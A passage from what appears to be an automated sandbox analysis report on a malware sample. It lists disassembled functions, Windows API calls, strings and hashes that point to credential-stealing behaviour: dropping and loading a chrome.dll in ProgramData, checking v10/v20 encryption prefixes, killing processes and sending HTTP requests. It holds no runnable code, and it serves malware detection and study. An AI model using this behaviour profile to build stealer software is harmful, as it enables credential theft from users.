Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048D56A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 048D56DF

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D5777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048D57CF
Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D57E6
Part of subcall function 048D5777: StrStrA.SHLWAPI(00000000,00000000), ref: 048D581B
Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D583A
Part of subcall function 048D5777: strtok.MSVCRT(00000000,?), ref: 048D5855
Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D5865

StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 048D5C42
StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 048D5DF7
StrCmpCA.SHLWAPI(00000000,004210D8), ref: 048D5EC3
Sleep.KERNEL32(0000EA60), ref: 048D5ED2

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID:
API String ID: 3630751533-0
Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
Instruction ID: 42adfbeebba5fda8e49c5c5bd79f6aa2f18e5f7ffea7e204c21e0083d3325bcf
Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
Instruction Fuzzy Hash: 76E12331902204ABDB18FBA8DC95DED7379AF54204F508B6DE447E6094EFB5BB08CB52

Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871

Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098

StrCmpCA.SHLWAPI(00000000,02EB23E0), ref: 00410922
StrCmpCA.SHLWAPI(00000000,02EB22F0), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,02EB2430), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Strings

C:\ProgramData\chrome.dll, xrefs: 004108CD
C:\ProgramData\chrome.dll, xrefs: 00410C30

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
Opcode Fuzzy Hash: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A

Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
memset.MSVCRT ref: 0040A60B
LocalAlloc.KERNEL32(00000040,?), ref: 0040A664

Strings

@, xrefs: 0040A614
v20, xrefs: 0040A571
v10, xrefs: 0040A5C6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @$v10$v20
API String ID: 631489823-278772428
Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A

Function 048C1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048C158E

Part of subcall function 048C1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 048C151B
Part of subcall function 048C1507: RtlAllocateHeap.NTDLL(00000000), ref: 048C1522
Part of subcall function 048C1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 048C153E
Part of subcall function 048C1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 048C155C
Part of subcall function 048C1507: RegCloseKey.ADVAPI32(?), ref: 048C1566

lstrcat.KERNEL32(?,00000000), ref: 048C15B6
lstrlen.KERNEL32(?), ref: 048C15C3
lstrcat.KERNEL32(?,0042640C), ref: 048C15DE

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

CopyFileA.KERNEL32(?,00000000,00000001), ref: 048C16CC

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451

DeleteFileA.KERNEL32(00000000), ref: 048C1756
memset.MSVCRT ref: 048C177D

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID:
API String ID: 3885987321-0
Opcode ID: 2a97d6376cda74d6d1336d73f706b43986f81e299c9fded5963d5511903ee699
Instruction ID: babdb762142458a22e298c0f2f14ca5ebb6ba90f9593987c7c31f16e53ea8230
Opcode Fuzzy Hash: 2a97d6376cda74d6d1336d73f706b43986f81e299c9fded5963d5511903ee699
Instruction Fuzzy Hash: C95176B1D4121897DB18FB64DC94FED73389F54305F504AE9A60AE2090EFB06B88CF96

Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,02EB5978,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00414A51
lstrcatA.KERNEL32(?,?), ref: 00414A70
lstrcatA.KERNEL32(?,?), ref: 00414A84
lstrcatA.KERNEL32(?,02E35AB0), ref: 00414A97
lstrcatA.KERNEL32(?,?), ref: 00414AAB
lstrcatA.KERNEL32(?,02EB5E10), ref: 00414ABF

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99

Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
CloseHandle.KERNEL32(00000000), ref: 00419A79
CloseHandle.KERNEL32(0040A056), ref: 00419A88

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51

Function 048D9C07 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9C2C
Process32First.KERNEL32(048CA2BD,00000128), ref: 048D9C40
Process32Next.KERNEL32(048CA2BD,00000128), ref: 048D9C59
OpenProcess.KERNEL32(00000001,00000000,?), ref: 048D9CB5
TerminateProcess.KERNEL32(00000000,00000000), ref: 048D9CD3
CloseHandle.KERNEL32(00000000), ref: 048D9CE0
CloseHandle.KERNEL32(048CA2BD), ref: 048D9CEF

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: bea2bf10e7e47b53d79e5bb15174b41607d68ce51f856ec118bf55d5e8399f4f
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: AF212CB4905218EBDB21DF55CC88BEDB7B9BB48304F0046C9E50AA7290D774AB84CF91

Function 048C4A67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00

Strings

<, xrefs: 048C4A80

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
Instruction ID: b5ba638479372f2b68545b55b2f44c25a5b411641b7f2a5ce69a0edb79194b4f
Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
Instruction Fuzzy Hash: 92213E71D00219EBDF14DFA8EC49ADD7B74FF44320F108225E925A7290EB706A05CF91

Function 048D7A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7A9B
RtlAllocateHeap.NTDLL(00000000), ref: 048D7AA2
RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 048D7AD4
RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 048D7AF5
RegCloseKey.ADVAPI32(00000000), ref: 048D7AFF

Strings

Windows 11, xrefs: 048D7AB4

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 8f1bda9618eeb2df5c2b66197292837467a899c03196e94c4cd199e0973d43cf
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: F2014F79E06309BBEB00DBE4ED49F6D77B9EF48701F004596FA05E6290E770AA408B91

Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
CloseHandle.KERNEL32(000000FF), ref: 004194B7

Strings

>=A, xrefs: 004194A1, 004194CD, 004194A4
>=A, xrefs: 00419488, 0041948B

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=A$>=A
API String ID: 1378416451-3536956848
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85

Function 048C7597 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 048C7601
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 048C7678
StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048C76D4
GetProcessHeap.KERNEL32(00000000,?), ref: 048C7719
HeapFree.KERNEL32(00000000), ref: 048C7720

Part of subcall function 048C94F7: vsprintf_s.MSVCRT ref: 048C9512

task.LIBCPMTD ref: 048C781C

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
String ID:
API String ID: 700816787-0
Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
Instruction ID: 501701255a239e354dff8039a9a6912bafd89d49f895c6e557837237bb34d468
Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
Instruction Fuzzy Hash: 8B611EB594016D9BEB24DF64CC44FD9B7B8BF48304F0086E9E649A6140EBB0ABC5CF91

Function 048D5777 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048C6537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 048C6598
Part of subcall function 048C6537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C65BA
Part of subcall function 048C6537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C65EC
Part of subcall function 048C6537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C663C
Part of subcall function 048C6537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 048C6676
Part of subcall function 048C6537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 048C6688

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048D57CF
lstrlen.KERNEL32(00000000), ref: 048D57E6

Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249

StrStrA.SHLWAPI(00000000,00000000), ref: 048D581B
lstrlen.KERNEL32(00000000), ref: 048D583A
strtok.MSVCRT(00000000,?), ref: 048D5855
lstrlen.KERNEL32(00000000), ref: 048D5865

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID:
API String ID: 3532888709-0
Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
Instruction ID: c40e09c8e71571d7eb3209f36dc6350cd8a45f2ec47d42091356a1e7016a0b3a
Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
Instruction Fuzzy Hash: 30510130902108ABDB1CFF68DD95EED7735AF10309F604A69D806E7590EBB57B04CB52

Function 048D75B7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 048D75C5

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

OpenProcess.KERNEL32(001FFFFF,00000000,048D77F4,004205C5), ref: 048D7603
memset.MSVCRT ref: 048D7651
??_V@YAXPAX@Z.MSVCRT(?), ref: 048D77A5

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID:
API String ID: 224852652-0
Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
Instruction ID: a11190d0f193028dcf9cbfbddc07a73a538cbd3642d30c7d6862c0d235025ebf
Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
Instruction Fuzzy Hash: 6E5151B0D01218DBDB14EFA8DC84BEDB7B4AF04309F504AA9D115E7181EBB47A84CF59

Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414325
RegOpenKeyExA.ADVAPI32(80000001,02EB5D10,00000000,00020119,?), ref: 00414344
RegQueryValueExA.ADVAPI32(?,02EB58B8,00000000,00000000,00000000,000000FF), ref: 00414368
RegCloseKey.ADVAPI32(?), ref: 00414372
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
lstrcatA.KERNEL32(?,02EB58E8), ref: 004143AB

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1

Function 048D4567 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048D458C
RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 048D45AB
RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 048D45CF
RegCloseKey.ADVAPI32(?), ref: 048D45D9
lstrcat.KERNEL32(?,00000000), ref: 048D45FE
lstrcat.KERNEL32(?,006D6B68), ref: 048D4612

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
Instruction ID: 8774c7fd0d9d653cd2a740efd81e8574490e7f0433c2f0586f80ed3da085039f
Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
